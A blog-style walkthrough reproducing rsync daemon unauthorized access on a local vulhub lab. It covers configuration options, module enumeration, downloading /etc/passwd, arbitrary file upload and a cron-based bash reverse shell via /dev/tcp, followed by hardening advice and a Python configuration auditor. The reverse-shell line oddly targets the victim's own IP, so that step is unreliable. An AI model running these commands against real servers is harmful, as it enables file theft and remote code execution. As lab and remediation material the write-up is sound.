xfeng


rsync Unauthorized Access Vulnerability Reproduction

1. Vulnerability Introduction

rsync is a remote data synchronization tool for Linux/Unix that synchronizes files and directories between local and remote hosts. Its daemon mode listens on TCP port 873 by default. When the daemon is misconfigured, anyone can access it without authentication, which allows them to download files from the server and, where a module is writable, upload files to it.

The main risks associated with unauthorized access to rsync are:

  • Serious information leakage
  • Uploading script backdoor files and remote command execution

2. rsync Configuration File


Parameter	Description
uid	The user name or user ID that the daemon uses for file transfers in this module
gid	One or more group names/IDs used when accessing the module
use chroot	If set to true, rsync chroots to the directory given by path before transferring files. This adds protection, but it requires root privileges and cannot back up files reached through symbolic links that point outside path
max connections	Maximum number of concurrent connections for this module, to protect the server. Connection requests above the limit are told to try again later
syslog facility	Facility (message level) used when rsync sends log messages to syslog
pid file	The rsync daemon writes its PID to this file
log file	Log file for the rsync daemon; when set, the log is not sent to syslog
path	Synchronization path of the current module on the rsync server; this parameter must be specified
comment	Description of the module, shown together with the module name when a client connects and requests the module list
read only	Whether clients may upload files. If true, uploading is not allowed; if false and the server directory is writable, uploading is allowed
auth users	Authentication user name(s). May be left unset, in which case no password is required; setting it gives higher security
secrets file	Password file; must be set if auth users is set, and its permissions should be 400
hosts allow	Hosts allowed to connect; may be a network segment, with multiple IP addresses separated by spaces

3. Common rsync Commands

-a, --archive	Archive mode, indicates recursive file transfer and preserves all file attributes, equivalent to -rlptgoD (note that -H is not included)
-v, --verbose	Verbose output mode
-r, --recursive	Process directories recursively
-l, --links	Preserve symbolic links, with this parameter, the synchronized files will retain their previous symbolic link attributes
-H, --hard-links	Preserve hard links
-p, --perms	Preserve file permissions
-t, --times	Preserve file time information
-g, --group	Preserve file group information
-o, --owner	Preserve file owner information (super-user only)
-D	Preserve device and special files (super-user only)
-e, --rsh=COMMAND	Specify the shell program to replace rsh
-z, --compress	Compress files during transfer
--stats	Provide transfer status for certain files
--progress	Display transfer progress during transfer
--timeout=TIME	I/O timeout during synchronization, in seconds
--exclude=PATTERN	Specify files or subdirectories to be filtered out during synchronization (i.e., not synchronized); PATTERN names an individual file or subdirectory to skip (without a path). To filter multiple files or subdirectories, repeat --exclude
--exclude-from=FILE	Specify files or subdirectories to be filtered out using a list file (e.g., /root/exclude.txt) that contains the files and subdirectories not to be synchronized
--include=PATTERN	Specify file matching patterns to be transferred
--include-from=FILE	Read inclusion rules from FILE
--copy-unsafe-links	Copy link files that point to directories outside the SRC path tree
--safe-links	Ignore link files that point to directories outside the SRC path tree (default)
--existing	Only update files that already exist on the receiving end, without backing up newly created files
--ignore-existing	Ignore files that already exist on the receiving end and only back up newly created files
-b, --backup	When changes occur, back up old versions of files in the target directory
--backup-dir=DIR	Used in conjunction with -b, stores backed-up files in the DIR directory
--link-dest=DIR	Create hard link files based on DIR when files have not changed
--delete	Delete extraneous files in the target directory that do not exist in the source directory. This is the best choice for rsync to perform incremental full backups
--delete-before	The receiver performs deletions before the transfer: the target directory is cleaned up first, and then the source directory files are copied over. This is how rsync keeps the target directory consistent with the source directory
--delete-after	Compare after the synchronization operation and delete excess files in the target directory that do not exist in the source directory
--delete-excluded	Delete files excluded by this option in the target directory
--ignore-errors	Delete even if I/O errors occur
--partial	Keep files that have not been completely transferred due to unforeseen circumstances, in order to speed up subsequent retransfers
-P	Equivalent to --partial --progress
--delay-updates	Save files being updated to a temporary directory (default is ".~tmp~") before updating the target file after transmission is complete
-q, --quiet	Simplified output mode
-h, --human-readable	Use human-readable units for file sizes (e.g., K, M, etc.)
-n, --dry-run	Display which files will be transferred
--list-only	List files without copying
--rsync-path=PROGRAM	Specify the path to the rsync program on the remote server
--password-file=FILE	Read the password from FILE to avoid entering the password on the terminal, usually used when connecting to the rsync server in cron
--version	Print version information
--port=PORT	Specify an alternate rsync server port
--log-format=FORMAT	Specify the log file format
--bwlimit=KBPS	Limit I/O bandwidth, KBytes per second
--help	Display help information
-4, --ipv4	Use IPv4
-6, --ipv6	Use IPv6

4. Vulnerability Reproduction

4.1 Setting up the Target Environment

Use the vulhub target environment to reproduce the vulnerability:

wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip

unzip vulhub-master.zip

cd vulhub-master/rsync/common
sudo docker-compose up -d

4.2 Scanning the Target System for Open rsync Services

Use nmap to check whether the target exposes an rsync service on port 873, then run the rsync-list-modules NSE script against it:

sudo nmap -p 873 192.168.110.128

sudo nmap -p 873 --script rsync-list-modules 192.168.110.128

4.3 Listing the Synchronization Directories on the Target Server

Use the rsync client to list the modules (synchronization directories) exported by the server and browse their contents:

rsync 192.168.110.128::

rsync rsync://192.168.110.128:873/src

rsync 192.168.110.128::src

4.4 Arbitrary File Download

The /etc/passwd file can be downloaded from the server:

sudo rsync -av 192.168.110.128::src/etc/passwd ./

4.5 Arbitrary File Writing

Create a test file, upload it to the server, and then list the module again to confirm that it was written:

sudo touch 1.txt && sudo chmod 777 1.txt && echo "test" >> 1.txt

sudo rsync -av 1.txt rsync://192.168.110.128:873/src/1.txt

rsync rsync://192.168.110.128:873/src

4.6 Getting a Shell Using the Arbitrary File Write and Download

sudo rsync rsync://192.168.110.128:873/src/etc/crontab ./

sudo touch shell && sudo chmod 777 shell && echo "/bin/bash -i >& /dev/tcp/192.168.110.128/8888" >> shell

rsync -av shell rsync://192.168.110.128:873/src/etc/cron.hourly

nc -lvp 8888

5. Vulnerability Fix

  • Modify the default rsync configuration file /etc/rsyncd.conf and add or modify the following parameters:
    • Access control: set hosts allow to restrict the IP addresses allowed to connect.
    • Permission control: set read only = true to make the module read-only.
    • Access authentication: set auth users and secrets file, so that the module can only be used after successful authentication.
    • Module hiding: set list = false to hide the module from the module list.
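As an added example that is not part of this post or of vulhub, the following Python script parses an rsyncd.conf and flags the weak settings discussed in sections 2 and 5 (anonymous access, writable module, no hosts allow, listed module, no chroot, path = /). Both sample configurations are constructed: the weak one is shaped like the vulhub src module and the hardened one applies the fixes above; the module name, user name, paths and network range in them are assumptions.

```python
# Constructed sample shaped like the vulhub "src" module (not the project's own
# file): anonymous, writable, listed, rooted at / and open to any source host.
WEAK_CONF = """\
use chroot = no
[src]
    path = /
    read only = no
"""

# The same module with the section 5 fixes applied (also constructed).
HARDENED_CONF = """\
[src]
    path = /data/src
    read only = yes
    list = no
    auth users = backup
    secrets file = /etc/rsyncd.secrets
    hosts allow = 192.168.110.0/24
"""

YES = {"yes", "true", "1"}

def parse_rsyncd_conf(text):
    """Parse rsyncd.conf into (global settings, {module: settings}), lower-cased."""
    globs, modules, cur = {}, {}, None
    for line in (raw.split("#", 1)[0].strip() for raw in text.splitlines()):
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):  # [module] header
            cur = line[1:-1].strip()
            modules[cur] = {}
            continue
        key, _, val = line.partition("=")
        (globs if cur is None else modules[cur])[key.strip().lower()] = val.strip().lower()
    return globs, modules

def audit_module(cfg, globs):
    """Findings for one module: a module setting overrides the global one, and
    unset keys take the rsyncd.conf(5) defaults (read only, list, use chroot = yes)."""
    get = lambda key, default="": cfg.get(key, globs.get(key, default))
    checks = [
        (not get("auth users"), "no 'auth users': anonymous access is allowed"),
        (get("auth users") and not get("secrets file"), "'auth users' set without 'secrets file'"),
        (get("read only", "yes") not in YES, "'read only = no': clients can upload files"),
        (not get("hosts allow"), "no 'hosts allow': any source IP may connect"),
        (get("list", "yes") in YES, "'list = yes': module is shown to anonymous clients"),
        (get("use chroot", "yes") not in YES, "'use chroot = no': transfers are not confined by chroot"),
        (get("path") == "/", "'path = /': module exposes the whole filesystem"),
    ]
    return [msg for bad, msg in checks if bad]
```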

6. Reference Video
